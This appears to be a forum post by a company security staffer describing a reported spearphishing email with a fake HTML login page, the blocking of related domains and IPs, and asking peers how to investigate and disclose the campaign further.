An employee at my company received a spearphishing email, but fortunately she reported it to us before submitting any credentials. Running internal phishing awareness campaigns works!
The email contained a classic html file with a fake login, the employee’s email was hard coded into the code, this was a targeted attack. Upon inspecting the file I found a domain from southwest Europe to which the credentials were supposed to be sent to, which had no reports anywhere so far. We suspect the server might be compromised or abandoned, since it hosts the website of a legitimate website. The domain was blocked nonetheless.
I have also identified the email server which sent the email and immediately blocked the IP addresses and email domains related to it. The company who owns the email domain has a website, and its DNS records show an IP address that has been reported several times as an address used for malware delivery.
I don’t have much experience with spearphishing yet. My company does not yet produce intelligence reports or bulletins, but I think I would like to do more about this campaign. What other steps should we take to further investigate or disclose this campaign? How do you guys handle spearphishing campaigns?